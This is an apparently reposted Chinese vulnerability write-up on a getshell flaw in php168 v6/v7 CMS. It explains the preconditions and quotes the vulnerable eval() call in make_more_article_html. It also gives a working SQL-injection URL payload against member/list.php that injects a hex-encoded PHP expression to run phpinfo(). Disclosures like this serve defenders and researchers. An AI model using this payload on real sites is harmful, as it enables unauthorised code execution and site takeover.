• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    公众号

php168 v6/v7鸡肋Getshell安全问题

原作者: [db:作者] 来自: [db:来源] 收藏 邀请

  刚搜了一下貌似和以前一个漏洞是一个问题。有点鸡肋,需要条件:

  1.网站配置为:文章生成真静态

  2.允许注册会员

  给出v6的测试代码,提交后执行phpinfo(),v7原理一样,只是数据库字段数不一样。

  member/list.php?step=2&Type=delete&aidDB[]=-1)%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,15,6,7,8,9,10,1,2,3,4,25,6,7,8,9,10,1,2,3,4,35,6,7,8,9,10,1,2,3,4,45,6,7,8,9,10,1,2,3,4,0x7B247B706870696E666F28297D7D,6,7%23

  0x01 漏洞在make_more_article_html这个函数:

  function make_more_article_html($comebackurl='/',$type='',$aidDB=''){

  global $db,$pre,$webdb,$webdb,$showHtml_Type;

  if($webdb[NewsMakeHtml]!=1||$aidDB=='') // $webdb[NewsMakeHtml] 真静态

  { return ;}

  ...

  $query = $db->query("SELECT A.*,B.bencandy_html,B.list_html,D.aid FROM {$pre}article_db D LEFT JOIN {$pre}article A ON D.aid=A.aid LEFT JOIN {$pre}sort B ON A.fid=B.fid WHERE D.aid IN ($string)");

  while($rs = $db->fetch_array($query)){

  ...

  $filename_b=$rs[bencandy_html];

  ...

  eval("\$showurl=\"$filename_b\";");

  ...

  0x02 在 \member\list.php中调用了该漏洞函数:

  if($step==2){

  ...

  if($Type=='delete'){

  make_more_article_html("$FROMURL","del_0",$aidDB);

  by: k4shifz[w.s.t]


鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
FeiXun企业网站管理系统v2011上传漏洞通杀0day及发布时间:2022-02-06
下一篇:
网站服务器如何有效防御PHP木马攻击发布时间:2022-02-06
热门推荐
热门话题
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap